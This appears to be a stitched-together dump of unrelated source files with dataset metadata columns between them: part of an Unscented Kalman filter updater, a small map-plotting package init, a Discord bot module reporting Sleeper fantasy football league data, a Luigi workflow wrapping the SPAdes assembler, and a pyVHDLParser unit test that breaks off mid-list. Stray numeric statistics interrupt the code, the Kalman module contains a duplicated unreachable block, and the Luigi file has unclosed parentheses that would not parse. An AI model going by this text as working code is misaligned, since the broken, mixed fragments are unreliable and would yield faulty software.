y : :class:`numpy.ndarray` of shape (Nm,1)
The measurement vector
y_pred: :class:`numpy.ndarray` of shape (Nm,1)
The predicted measurement mean
S: :class:`numpy.ndarray` of shape (Nm,Nm)
The predicted measurement noise (innovation) covariance matrix
Pxy: :class:`numpy.ndarray` of shape (Ns,Nm), optional
The state-to-measurement cross covariance
Returns
-------
: :class:`numpy.ndarray` of shape (Ns,1)
The computed posterior state mean
: :class:`numpy.ndarray` of shape (Ns,Ns)
The computed posterior state covariance
: :class:`numpy.ndarray` of shape (Ns,Nm)
The computed Kalman gain
"""
return KalmanUpdater.update_on_measurement_prediction(x_pred, P_pred,
y, y_pred, S,
Pxy, H, R)
@staticmethod
def _extract_model_parameters(measurement_model, state_vector=None,
measurement=None, **kwargs):
"""Extract measurement model parameters
Parameters
----------
measurement_model: :class:`~.MeasurementModel`
A measurement model whose parameters are to be extracted
measurement : :class:`~.Detection`, optional
If provided and `measurement.measurement_model` is not `None`,\
then its parameters will be returned instead\
(the default is `None`, in which case `self.measurement_model`'s\
parameters will be returned)
Returns
-------
: :class:`numpy.ndarray` of shape (Nm,Nm)
The measurement model transformation matrix
: :class:`numpy.ndarray` of shape (Nm,Nm)
The measurement model covariance matrix
"""
if(measurement is not None
and measurement.measurement_model is not None):
return ExtendedKalmanUpdater._extract_model_parameters(
measurement.measurement_model, state_vector=state_vector)
else:
try:
# Attempt to extract matrix from a LinearModel
measurement_matrix = measurement_model.matrix(**kwargs)
except AttributeError:
# Else read jacobian from a NonLinearModel
measurement_matrix = \
measurement_model.jacobian(state_vector,
**kwargs)
def measurement_function(x):
return measurement_model.function(x, noise=0, **kwargs)
measurement_noise_covar = measurement_model.covar(**kwargs)
return measurement_matrix, measurement_noise_covar, \
measurement_function
class UnscentedKalmanUpdater(KalmanUpdater):
"""Unscented Kalman Updater
Perform measurement update step in the Unscented Kalman Filter.
"""
alpha = Property(float, default=0.5,
doc="Primary sigma point spread scalling parameter.\
Typically 1e-3.")
beta = Property(float, default=2,
doc="Used to incorporate prior knowledge of the distribution.\
If the true distribution is Gaussian, the value of 2\
is optimal.")
kappa = Property(float, default=0,
doc="Secondary spread scaling parameter\
(default is calculated as 3-Ns)")
@lru_cache()
def get_measurement_prediction(self, state_prediction,
measurement_model=None, **kwargs):
"""Unscented Kalman Filter measurement prediction step
Parameters
----------
state_prediction : :class:`~.GaussianStatePrediction`
A predicted state object
measurement_model: :class:`~.MeasurementModel`, optional
The measurement model used to generate the measurement prediction.\
Should be used in cases where the measurement model is dependent\
on the received measurement.\
(the default is ``None``, in which case the updater will use the\
measurement model specified on initialisation)
Returns
-------
: :class:`~.GaussianMeasurementPrediction`
The measurement prediction
"""
# Measurement model parameters
if measurement_model is None:
measurement_model = self.measurement_model
measurement_function, measurement_noise_covar = \
self._extract_model_parameters(measurement_model)
meas_pred_mean, meas_pred_covar, cross_covar = \
self.get_measurement_prediction_lowlevel(state_prediction.mean,
state_prediction.covar,
measurement_function,
measurement_noise_covar,
self.alpha, self.beta,
self.kappa)
return GaussianMeasurementPrediction(meas_pred_mean, meas_pred_covar,
state_prediction.timestamp,
cross_covar)
meas_pred_mean, meas_pred_covar, cross_covar = \
self.get_measurement_prediction_lowlevel(state_prediction.mean,
state_prediction.covar,
measurement_function,
measurement_noise_covar,
self.alpha, self.beta,
self.kappa)
return GaussianMeasurementPrediction(meas_pred_mean, meas_pred_covar,
state_prediction.timestamp,
cross_covar)
def update(self, hypothesis, **kwargs):
""" Unscented Kalman Filter update step
Parameters
----------
hypothesis : :class:`~.Hypothesis`
Hypothesis with predicted state and associated detection used for
updating.
Returns
-------
: :class:`~.GaussianState`
The state posterior
"""
# Extract model parameters
measurement_function, measurement_noise_covar = \
self._extract_model_parameters(self.measurement_model,
hypothesis.measurement)
# If no measurement prediction is provided with hypothesis
if hypothesis.measurement_prediction is None:
# Perform full update step
posterior_mean, posterior_covar, meas_pred_mean,\
meas_pred_covar, cross_covar, _ = \
self.update_lowlevel(
hypothesis.prediction.mean,
hypothesis.prediction.covar,
measurement_function,
measurement_noise_covar,
hypothesis.measurement.state_vector,
self.alpha, self.beta, self.kappa
)
# Augment hypothesis with measurement prediction
hypothesis = SingleHypothesis(hypothesis.prediction,
hypothesis.measurement,
GaussianMeasurementPrediction(
meas_pred_mean, meas_pred_covar,
hypothesis.prediction.timestamp,
cross_covar)
)
else:
posterior_mean, posterior_covar, _ =\
self.update_on_measurement_prediction(
hypothesis.prediction.mean,
hypothesis.prediction.covar,
hypothesis.measurement.state_vector,
hypothesis.measurement_prediction.mean,
hypothesis.measurement_prediction.covar,
hypothesis.measurement_prediction.cross_covar
)
return GaussianStateUpdate(posterior_mean,
posterior_covar,
hypothesis,
hypothesis.measurement.timestamp)
@staticmethod
def update_lowlevel(x_pred, P_pred, h, R, y, alpha, beta, kappa):
"""Low level Unscented Kalman Filter update
Parameters
----------
x_pred: :class:`numpy.ndarray` of shape (Ns,1)
The predicted state mean
P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
The predicted state covariance
h : function handle
The (non-linear) measurement model function
Must be of the form "y = fun(x,w)"
R : :class:`numpy.ndarray` of shape (Nm,Nm)
The measurement noise covariance matrix
y : :class:`numpy.ndarray` of shape (Nm,1)
The measurement vector
alpha : float
Spread of the sigma points.
beta : float
Used to incorporate prior knowledge of the distribution
2 is optimal is the state is normally distributed.
kappa : float
Secondary spread scaling parameter
Returns
-------
: :class:`numpy.ndarray` of shape (Ns,1)
The computed posterior state mean
: :class:`numpy.ndarray` of shape (Ns,Ns)
The computed posterior state covariance
: :class:`numpy.ndarray` of shape (Ns,Nm)
The computed Kalman gain
"""
y_pred, S, Pxy = \
UnscentedKalmanUpdater.get_measurement_prediction_lowlevel(
x_pred, P_pred, h, R,
alpha, beta, kappa)
x_post, P_post, K = \
UnscentedKalmanUpdater.update_on_measurement_prediction(
x_pred, P_pred, y, y_pred, S, Pxy)
return x_post, P_post, y_pred, S, Pxy, K
@staticmethod
def get_measurement_prediction_lowlevel(x_pred, P_pred, h, R,
alpha, beta, kappa):
"""Low level Unscented Kalman Filter measurement prediction
Parameters
----------
x_pred: :class:`numpy.ndarray` of shape (Ns,1)
The predicted state mean
P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
The predicted state covariance
h : function handle
The (non-linear) measurement model function
Must be of the form "y = fun(x,w)"
R : :class:`numpy.ndarray` of shape (Nm,Nm)
The measurement noise covariance matrix
alpha : float
Spread of the sigma points.
beta : float
Used to incorporate prior knowledge of the distribution
2 is optimal is the state is normally distributed.
kappa : float
Secondary spread scaling parameter
Returns
-------
: :class:`numpy.ndarray` of shape (Nm,1)
The predicted measurement mean
: :class:`numpy.ndarray` of shape (Nm,Nm)
The predicted measurement noise (innovation) covariance matrix
: :class:`numpy.ndarray` of shape (Ns,Nm), optional
The state-to-measurement cross covariance
"""
sigma_points, mean_weights, covar_weights = \
gauss2sigma(x_pred, P_pred, alpha, beta, kappa)
y_pred, S, Pxy, _, _, _ = unscented_transform(sigma_points,
mean_weights,
covar_weights,
h, covar_noise=R)
return y_pred, S, Pxy
@staticmethod
def update_on_measurement_prediction(x_pred, P_pred, y,
y_pred, S, Pxy):
"""Low level Unscented Kalman Filter update, based on a measurement\
prediction
Parameters
----------
x_pred: :class:`numpy.ndarray` of shape (Ns,1)
The predicted state mean
P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
The predicted state covariance
y : :class:`numpy.ndarray` of shape (Nm,1)
The measurement vector
y_pred: :class:`numpy.ndarray` of shape (Nm,1)
The predicted measurement mean
S: :class:`numpy.ndarray` of shape (Nm,Nm)
The predicted measurement noise (innovation) covariance matrix
Pxy: :class:`numpy.ndarray` of shape (Ns,Nm), optional
The state-to-measurement cross covariance
Returns
-------
: :class:`numpy.ndarray` of shape (Ns,1)
The computed posterior state mean
: :class:`numpy.ndarray` of shape (Ns,Ns)
The computed posterior state covariance
: :class:`numpy.ndarray` of shape (Ns,Nm)
The computed Kalman gain
"""
return KalmanUpdater.update_on_measurement_prediction(x_pred, P_pred,
y, y_pred, S,
Pxy)
@staticmethod
def _extract_model_parameters(measurement_model, measurement=None,
**kwargs):
"""Extract measurement model parameters
Parameters
----------
measurement_model: :class:`~.MeasurementModel`
A measurement model whose parameters are to be extracted
measurement : :class:`~.Detection`, optional
If provided and `measurement.measurement_model` is not `None`,\
then its parameters will be returned instead\
(the default is `None`, in which case `self.measurement_model`'s\
parameters will be returned)
Returns
-------
: function handle
The (non-linear) measurement model function
: :class:`numpy.ndarray` of shape (Nm,Nm)
The measurement model covariance matrix
"""
if(measurement is not None
and measurement.measurement_model is not None):
return UnscentedKalmanUpdater._extract_model_parameters(
measurement.measurement_model)
else:
def measurement_function(x, w=0):
return measurement_model.function(x, w, **kwargs)
measurement_noise_covar = measurement_model.covar(**kwargs)
return measurement_function, measurement_noise_covar
| 41.311751
| 82
| 0.541011
| 3,265
| 34,454
| 5.552221
| 0.064319
| 0.072374
| 0.072209
| 0.080704
| 0.90203
| 0.893149
| 0.873235
| 0.863857
| 0.841792
| 0.840909
| 0
| 0.002178
| 0.38698
| 34,454
| 833
| 83
| 41.361345
| 0.856115
| 0.397138
| 0
| 0.700617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061728
| false
| 0
| 0.024691
| 0.006173
| 0.175926
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
92a48888f3684ea726a941442827c5b22e80e9a9
| 140
|
py
|
Python
|
cartomap/__init__.py
|
mrinalghosh/cartomap
|
741c5916ad180b382dd1e60e5c8bb5168899c878
|
[
"MIT"
] | 1
|
2020-12-09T05:39:28.000Z
|
2020-12-09T05:39:28.000Z
|
cartomap/__init__.py
|
mrinalghosh/cartomap
|
741c5916ad180b382dd1e60e5c8bb5168899c878
|
[
"MIT"
] | null | null | null |
cartomap/__init__.py
|
mrinalghosh/cartomap
|
741c5916ad180b382dd1e60e5c8bb5168899c878
|
[
"MIT"
] | null | null | null |
from .geogmap import plotCartoMap # noqa: F401
from .geogmap import plotKeogram # noqa: F401
from .geogmap import plotSlice # noqa: F401
| 35
| 47
| 0.764286
| 18
| 140
| 5.944444
| 0.444444
| 0.308411
| 0.476636
| 0.35514
| 0.46729
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077586
| 0.171429
| 140
| 3
| 48
| 46.666667
| 0.844828
| 0.228571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2bc6682a0a113004f1bcd408dfb86dafa5fd67ab
| 9,776
|
py
|
Python
|
sleeper_bot_commands/league.py
|
StoneMasons4106/sleeper-ffl-discordbot
|
a4f122f168561c154b889a17264b962264a0a20f
|
[
"MIT"
] | 1
|
2021-08-25T13:24:48.000Z
|
2021-08-25T13:24:48.000Z
|
sleeper_bot_commands/league.py
|
StoneMasons4106/sleeper-ffl-discordbot
|
a4f122f168561c154b889a17264b962264a0a20f
|
[
"MIT"
] | 2
|
2021-09-17T20:44:04.000Z
|
2021-09-23T23:38:36.000Z
|
sleeper_bot_commands/league.py
|
StoneMasons4106/sleeper-ffl-discordbot
|
a4f122f168561c154b889a17264b962264a0a20f
|
[
"MIT"
] | 1
|
2021-09-10T16:43:09.000Z
|
2021-09-10T16:43:09.000Z
|
import discord
import os
import sleeper_wrapper
import functions
if os.path.exists("env.py"):
import env
def my_league(ctx, bot):
if ctx.guild == None:
embed = 'This command is only available when sent in a guild rather than a DM. Try again there.'
else:
existing_league = functions.get_existing_league(ctx)
if existing_league:
if "league" in existing_league:
league_id = existing_league["league"]
league = sleeper_wrapper.League(int(league_id)).get_league()
users_object = sleeper_wrapper.League(int(league_id)).get_users()
users = []
for user in users_object:
users.append(user["display_name"])
embed = functions.my_embed('Sleeper League Info', 'Sleeper League General Information', discord.Colour.blue(), 'Name', f'[{league["name"]}](https://sleeper.app/leagues/{league_id})', False, bot)
embed.add_field(name='Members', value=", ".join(users), inline=False)
embed.add_field(name='Quantity', value=len(users), inline=False)
embed.add_field(name='Trade Deadline', value=f"Week {league['settings']['trade_deadline']}", inline=False)
embed.add_field(name='Playoffs Start', value=f"Week {league['settings']['playoff_week_start']}", inline=False)
if "score_type" in existing_league:
if existing_league["score_type"] == 'pts_ppr':
embed.add_field(name='Scoring Type', value='PPR', inline=False)
elif existing_league["score_type"] == 'pts_half_ppr':
embed.add_field(name='Scoring Type', value='Half PPR', inline=False)
elif existing_league["score_type"] == 'pts_std':
embed.add_field(name='Scoring Type', value='Standard', inline=False)
else:
pass
else:
embed = functions.my_embed('Sleeper League Info', 'Sleeper League Name and Member Info', discord.Colour.blue(), 'Members', 'No league specified, run add-league command to complete setup.', False, bot)
else:
embed = functions.my_embed('Sleeper League Info', 'Sleeper League Name and Member Info', discord.Colour.blue(), 'Members', 'No league specified, run add-league command to complete setup.', False, bot)
return embed
def my_league_standings(ctx, bot):
if ctx.guild == None:
embed = 'This command is only available when sent in a guild rather than a DM. Try again there.'
else:
existing_league = functions.get_existing_league(ctx)
if existing_league:
if "league" in existing_league:
league_id = existing_league["league"]
users_object = sleeper_wrapper.League(int(league_id)).get_users()
rosters_object = sleeper_wrapper.League(int(league_id)).get_rosters()
filtered_roster_object = []
for roster in rosters_object:
if roster["owner_id"] != None:
filtered_roster_object.append(roster)
else:
pass
standings_object = sleeper_wrapper.League(int(league_id)).get_standings(filtered_roster_object, users_object)
standings_string = ''
count = 0
for i in standings_object:
count = count + 1
standings_string += f'{str(count)}. {i[0]} / Record: {i[1]}-{i[2]} / Points For: {i[3]}\n'
embed = functions.my_embed('Sleeper League Standings', 'Display Current Standings of Sleeper League', discord.Colour.blue(), 'Standings', standings_string, False, bot)
else:
embed = functions.my_embed('Sleeper League Standings', 'Display Current Standings of Sleeper League', discord.Colour.blue(), 'Standings', 'No league specified, run add-league command to complete setup.', False, bot)
else:
embed = functions.my_embed('Sleeper League Standings', 'Display Current Standings of Sleeper League', discord.Colour.blue(), 'Standings', 'No league specified, run add-league command to complete setup.', False, bot)
return embed
def my_league_matchups(ctx, bot, week):
if ctx.guild == None:
embed = 'This command is only available when sent in a guild rather than a DM. Try again there.'
else:
if week.isnumeric():
if int(week) <= 18 and int(week) >= 1:
existing_league = functions.get_existing_league(ctx)
if existing_league:
if "league" in existing_league:
league_id = existing_league["league"]
users = sleeper_wrapper.League(int(league_id)).get_users()
rosters = sleeper_wrapper.League(int(league_id)).get_rosters()
matchups = sleeper_wrapper.League(int(league_id)).get_matchups(int(week))
if matchups:
sorted_matchups = sorted(matchups, key=lambda i: (i["matchup_id"] is None, i["matchup_id"]))
matchups_string = ''
count = 0
matchup_count = 1
for matchup in sorted_matchups:
if matchup["matchup_id"] is None:
pass
else:
count = count + 1
roster = next((roster for roster in rosters if roster["roster_id"] == matchup["roster_id"]), None)
user = next((user for user in users if user["user_id"] == roster["owner_id"]), None)
if (count % 2) == 0:
matchup_count = matchup_count + 1
matchups_string += f'{user["display_name"]}\n'
else:
matchups_string += f'{str(matchup_count)}. {user["display_name"]} vs. '
embed = functions.my_embed('Current Week Matchups', f'Matchups for Week {week}', discord.Colour.blue(), 'Matchups', matchups_string, False, bot)
else:
embed = 'There are no matchups this week, try this command again during the season!'
else:
embed = 'Please run add-league command, no Sleeper League connected.'
else:
embed = 'Please run add-league command, no Sleeper League connected.'
else:
embed = 'Invalid week number given. Choose a valid week between 1 and 18.'
else:
embed = 'Invalid week number given. Choose a valid week between 1 and 18.'
return embed
def my_league_scoreboard(ctx, bot, week):
if ctx.guild == None:
embed = 'This command is only available when sent in a guild rather than a DM. Try again there.'
else:
if week.isnumeric():
if int(week) <= 18 and int(week) >= 1:
existing_league = functions.get_existing_league(ctx)
if existing_league:
if "league" in existing_league:
league_id = existing_league["league"]
users = sleeper_wrapper.League(int(league_id)).get_users()
rosters = sleeper_wrapper.League(int(league_id)).get_rosters()
matchups = sleeper_wrapper.League(int(league_id)).get_matchups(int(week))
if matchups:
sorted_matchups = sorted(matchups, key=lambda i: (i["matchup_id"] is None, i["matchup_id"]))
scoreboard_string = ''
count = 0
matchup_count = 1
for matchup in sorted_matchups:
if matchup["matchup_id"] is None:
pass
else:
count = count + 1
roster = next((roster for roster in rosters if roster["roster_id"] == matchup["roster_id"]), None)
user = next((user for user in users if user["user_id"] == roster["owner_id"]), None)
if (count % 2) == 0:
matchup_count = matchup_count + 1
scoreboard_string += f'{user["display_name"]} - {matchup["points"]}\n'
else:
scoreboard_string += f'{str(matchup_count)}. {user["display_name"]} - {matchup["points"]} / '
embed = functions.my_embed(f'Week {week} Scoreboard', f'Scoreboard for Week {str(week)}', discord.Colour.blue(), 'Scoreboard', scoreboard_string, False, bot)
else:
embed = 'There are no matchups this week, try this command again during the season!'
else:
embed = 'Please run add-league command, no Sleeper League connected.'
else:
embed = 'Please run add-league command, no Sleeper League connected.'
else:
embed = 'Invalid week number given. Choose a valid week between 1 and 18.'
else:
embed = 'Invalid week number given. Choose a valid week between 1 and 18.'
return embed
| 61.484277
| 231
| 0.538973
| 1,064
| 9,776
| 4.804511
| 0.12218
| 0.065728
| 0.043036
| 0.049491
| 0.809859
| 0.778365
| 0.772887
| 0.74687
| 0.701291
| 0.672731
| 0
| 0.005797
| 0.364771
| 9,776
| 159
| 232
| 61.484277
| 0.817391
| 0
| 0
| 0.706667
| 0
| 0.006667
| 0.258259
| 0.023831
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026667
| false
| 0.026667
| 0.033333
| 0
| 0.086667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2bf6a55c0a6261df53f9a7237bf612e3a0d5beac
| 4,828
|
py
|
Python
|
spades-wf.py
|
BiobankLab/spades-wf
|
53a7706b145e3b0342b51a7698f96af45c710cba
|
[
"Apache-2.0"
] | null | null | null |
spades-wf.py
|
BiobankLab/spades-wf
|
53a7706b145e3b0342b51a7698f96af45c710cba
|
[
"Apache-2.0"
] | null | null | null |
spades-wf.py
|
BiobankLab/spades-wf
|
53a7706b145e3b0342b51a7698f96af45c710cba
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import luigi
import subprocess
from fatool import *
#if clear flag set firs task
class clear_cut(luigi.Task):
param = luigi.DictParameter()
def requires(self):
return []
def run(self):
for r in self.param['samples']:
for f in r['files']:
fa2clr = Fa.load_from_file(f)
nf = fa2clr.cut_min_len(self.param['minlen']
tmp_file = f.rsplit(',',1)
nf.write(tmp_file[0]+'_cleared.'+tmp_file[1])
def output(self):
rarray = []
for r in self.param['samples']:
for f in r['files']:
tmp_file = f.rsplit(',',1)
rarray.append(luigi.LocalTarget(tmp_file[0]+'_cleared.'+tmp_file[1])
return rarray
class spades(luigi.Task):
param = luigi.DictParameter()
def requires(self):
return [clear_cut(self.param)]
def run(self):
params = []
#preparing params to call spades same for every run
for r in self.param['params']:
if 'value' in r:
params += [r['name'], r['value']]
else:
params.append(r['name'].strip())
if 'output' in self.param:
output = self.param['output'].rstrip(' /')
else:
output = ''
#preparing files pe|s important
for r in self.param['samples']:
q = 1
files = []
if r['type'] == 'pe':
#pairend
for f in r['files']:
tmp_file = f.rsplit('.',1)
files += ['pe-1-'+str(q), tmp_file[0]+'_cleared.'+tmp_file[1]]
if q == 1:
q = 2
else:
q = 1
elif r['type'] == 's':
for f in r['files']:
tmp_file = f.rsplit('.',1)
files += ['s'+str(q), tmp_file[0]+'_cleared.'+tmp_file[1]]
q += 1
subprocess.call(['python', self.param['path2spades']+'spades.py']+params+files+['-0',output+'/'+r['name'].replace(' ','_')])
'''
python spades.py -k 21,33,55,77,99 --careful --s1 /media/blul/HS/FASTQ/Genomy/Bakteriofagi/ZIB_UL/72A/TRIM/72-A_S17_L001_R1_001_trimmed.fq --s2 /media/blul/HS/FASTQ/Genomy/Bakteriofagi/ZIB_UL/72A/TRIM/72-A_S17_L002_R1_001_trimmed.fq --s3 /media/blul/HS/FASTQ/Genomy/Bakteriofagi/ZIB_UL/72A/TRIM/72-A_S17_L003_R1_001_trimmed.fq --s4 /media/blul/HS/FASTQ/Genomy/Bakteriofagi/ZIB_UL/72A/TRIM/72-A_S17_L004_R1_001_trimmed.fq -o ../72-A_run -t 32
'''
def output(self):
rlist = []
if 'output' in self.param:
output = self.param['output'].rstrip(' /')
else:
output = ''
for r in self.param['samples']:
rlist.append(luigi.LocalTarget(output+'/'+r['name']+'/contigs.fasta'))
return rlist
class single_spades(luigi.Task):
param = luigi.DictParameter()
def requires(self):
return []
def run(self):
params = []
#preparing params to call spades same for every run
for r in self.param['params']:
if 'value' in r:
params += [r['name'], r['value']]
else:
params.append(r['name'].strip())
if 'output' in self.param:
output = self.param['output'].rstrip(' /')
else:
output = ''
#preparing files pe|s important
for r in self.param['samples']:
q = 1
files = []
if r['type'] == 'pe':
#pairend
for f in r['files']:
tmp_file = f.rsplit('.',1)
files += ['pe-1-'+str(q), tmp_file[0]+'_cleared.'+tmp_file[1]]
if q == 1:
q = 2
else:
q = 1
elif r['type'] == 's':
for f in r['files']:
tmp_file = f.rsplit('.',1)
files += ['s'+str(q), tmp_file[0]+'_cleared.'+tmp_file[1]]
q += 1
subprocess.call(['python', self.param['path2spades']+'spades.py']+params+files+['-0',output+'/'+r['name'].replace(' ','_')])
def output(self):
rlist = []
if 'output' in self.param:
output = self.param['output'].rstrip(' /')
else:
output = ''
for r in self.param['samples']:
rlist.append(luigi.LocalTarget(output+'/'+r['name']+'/contigs.fasta'))
return rlist
| 34.733813
| 450
| 0.46251
| 562
| 4,828
| 3.870107
| 0.197509
| 0.082759
| 0.06069
| 0.036782
| 0.833563
| 0.826667
| 0.826667
| 0.805517
| 0.805517
| 0.805517
| 0
| 0.036051
| 0.385253
| 4,828
| 138
| 451
| 34.985507
| 0.696766
| 0
| 0
| 0.873786
| 0
| 0
| 0.093317
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.029126
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ecfcc76dc64fe047443e9f837036f5f836ec2372
| 20,863
|
py
|
Python
|
tests/unit/SimpleBlockSequences/Entity.py
|
Xiretza/pyVHDLParser
|
23ddd633b45f68967fbfa860e1d04fd6d0aa4659
|
[
"Apache-2.0"
] | 55
|
2016-09-21T15:11:21.000Z
|
2022-03-08T11:14:38.000Z
|
tests/unit/SimpleBlockSequences/Entity.py
|
Xiretza/pyVHDLParser
|
23ddd633b45f68967fbfa860e1d04fd6d0aa4659
|
[
"Apache-2.0"
] | 27
|
2017-04-01T13:47:16.000Z
|
2022-01-17T14:37:16.000Z
|
tests/unit/SimpleBlockSequences/Entity.py
|
Xiretza/pyVHDLParser
|
23ddd633b45f68967fbfa860e1d04fd6d0aa4659
|
[
"Apache-2.0"
] | 15
|
2016-10-18T22:25:24.000Z
|
2021-12-01T18:04:33.000Z
|
from textwrap import dedent
from unittest import TestCase
from pyVHDLParser.Token import WordToken, StartOfDocumentToken, SpaceToken, CharacterToken, EndOfDocumentToken, LinebreakToken, IndentationToken
from pyVHDLParser.Blocks import StartOfDocumentBlock, EndOfDocumentBlock
from pyVHDLParser.Blocks.Common import WhitespaceBlock, LinebreakBlock, IndentationBlock
from pyVHDLParser.Blocks.Structural import Entity
from pyVHDLParser.Blocks.List import GenericList
from tests.unit.Common import Initializer, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence, BlockSequenceWithParserError, ExpectedTokenStream, ExpectedBlockStream, TokenLinking
if __name__ == "__main__":
print("ERROR: you called a testcase declaration file as an executable module.")
print("Use: 'python -m unitest <testcase module>'")
exit(1)
def setUpModule():
i = Initializer()
class SimpleEntity_OneLine_OnlyEnd(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
code = "entity e is end;"
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "e"),
(SpaceToken, " "),
(WordToken, "is"),
(SpaceToken, " "),
(WordToken, "end"),
(CharacterToken, ";"),
(EndOfDocumentToken, None)
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None), #
(Entity.NameBlock, "entity e is"), # entity e is
(WhitespaceBlock, " "), #
(Entity.EndBlock, "end;"), # end;
(EndOfDocumentBlock, None) #
]
)
class SimpleEntity_OneLine_EndWithKeyword(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
code = "entity e is end entity;"
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None), #
(WordToken, "entity"), # entity
(SpaceToken, " "), #
(WordToken, "e"), # e
(SpaceToken, " "), #
(WordToken, "is"), # is
(SpaceToken, " "), #
(WordToken, "end"), # end
(SpaceToken, " "), #
(WordToken, "entity"), # entity
(CharacterToken, ";"), # ;
(EndOfDocumentToken, None) #
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None), #
(Entity.NameBlock, "entity e is"), # entity e is
(WhitespaceBlock, " "), #
(Entity.EndBlock, "end entity;"), # end entity;
(EndOfDocumentBlock, None) #
],
)
class SimpleEntity_OneLine_EndWithName(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
code = "entity e is end e;"
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None), #
(WordToken, "entity"), # entity
(SpaceToken, " "), #
(WordToken, "e"), # e
(SpaceToken, " "), #
(WordToken, "is"), # is
(SpaceToken, " "), #
(WordToken, "end"), # end
(SpaceToken, " "), #
(WordToken, "e"), # e
(CharacterToken, ";"), # ;
(EndOfDocumentToken, None) #
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None), #
(Entity.NameBlock, "entity e is"), # entity e is
(WhitespaceBlock, " "), #
(Entity.EndBlock, "end e;"), # end e;
(EndOfDocumentBlock, None) #
]
)
class SimpleEntity_OneLine_EndWithKeywordAndName(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
code = "entity e is end entity e;"
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None), #
(WordToken, "entity"), # entity
(SpaceToken, " "), #
(WordToken, "e"), # e
(SpaceToken, " "), #
(WordToken, "is"), # is
(SpaceToken, " "), #
(WordToken, "end"), # end
(SpaceToken, " "), #
(WordToken, "entity"), # entity
(SpaceToken, " "), #
(WordToken, "e"), # e
(CharacterToken, ";"), # ;
(EndOfDocumentToken, None) #
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None), #
(Entity.NameBlock, "entity e is"), # entity e is
(WhitespaceBlock, " "), #
(Entity.EndBlock, "end entity e;"), # end entity e;
(EndOfDocumentBlock, None) #
]
)
class SimpleEntity_OneLine_NoName_EndWithKeywordAndName(TestCase, ExpectedDataMixin, TokenLinking, TokenSequence, BlockSequenceWithParserError):
code = "entity is end entity e;"
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None), #
(WordToken, "entity"), # entity
(SpaceToken, " "), #
(WordToken, "is"), # is
(SpaceToken, " "), #
(WordToken, "end"), # end
(SpaceToken, " "), #
(WordToken, "entity"), # entity
(SpaceToken, " "), #
(WordToken, "e"), # e
(CharacterToken, ";"), # ;
(EndOfDocumentToken, None) #
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None), #
(Entity.NameBlock, "entity is"), # entity is
(WhitespaceBlock, " "), #
(Entity.EndBlock, "end entity e;"), # end entity e;
(EndOfDocumentBlock, None) #
]
)
class SimpleEntity_OneLine_NoIs_EndWithKeywordAndName(TestCase, ExpectedDataMixin, TokenLinking, TokenSequence, BlockSequenceWithParserError):
code = "entity e end entity e;"
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None), #
(WordToken, "entity"), # entity
(SpaceToken, " "), #
(WordToken, "e"), # e
(SpaceToken, " "), #
(WordToken, "end"), # end
(SpaceToken, " "), #
(WordToken, "entity"), # entity
(SpaceToken, " "), #
(WordToken, "e"), # e
(CharacterToken, ";"), # ;
(EndOfDocumentToken, None) #
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None), #
(Entity.NameBlock, "entity e"), # entity e
(WhitespaceBlock, " "), #
(Entity.EndBlock, "end entity e;"), # end entity e;
(EndOfDocumentBlock, None) #
]
)
class SimpleEntity_OneLine_NoEnd_EndWithKeywordAndName(TestCase, ExpectedDataMixin, TokenLinking, TokenSequence, BlockSequenceWithParserError):
code = "entity e is entity e;"
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None), #
(WordToken, "entity"), # entity
(SpaceToken, " "), #
